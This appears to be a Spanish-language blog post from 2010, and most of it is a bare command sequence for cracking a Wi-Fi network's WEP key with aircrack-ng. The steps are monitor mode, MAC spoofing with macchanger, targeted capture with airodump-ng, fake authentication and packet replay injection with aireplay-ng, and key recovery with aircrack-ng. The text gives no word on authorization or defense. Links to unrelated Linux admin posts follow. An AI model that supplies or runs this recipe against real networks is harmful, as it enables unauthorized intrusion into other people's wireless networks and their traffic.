apt-get update
sudo apt-get install aircrack-ng
apt-get install macchanger
airmon-ng start wlan0
sudo ifconfig mon0 down
sudo macchanger -m 00:11:22:33:44:55 mon0
sudo ifconfig mon0 up
sudo airodump-ng mon0
control – c
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
TERMINAL 2
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
TERMINAL 3
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
Le decimos que si (y) y le damos enter
TERMINAL 4
sudo aircrack-ng -z [nombre red]*.cap
jueves, 18 de marzo de 2010
Suscribirse a:
Enviar comentarios (Atom)
Instalar systemd y systemd-sysv
Instalar systemd y s ystemd-sysv Debian $apt-get update $apt-get upgrade $apt-get install systemd $apt-get install systemd-sysv Este...
-
vim /etc/sysconfig/network hostname= nombre vim /etc/hosts 127.0.0.1 Nombre hostname nombre service nertworking restart
-
https://doc.owncloud.org/server/9.0/admin_manual/installation/php_55_installation.html#centos-7-upgrade-to-php-5-5 RHEL 7 Upgrade to P...
-
Instalar systemd y s ystemd-sysv Debian $apt-get update $apt-get upgrade $apt-get install systemd $apt-get install systemd-sysv Este...
No hay comentarios:
Publicar un comentario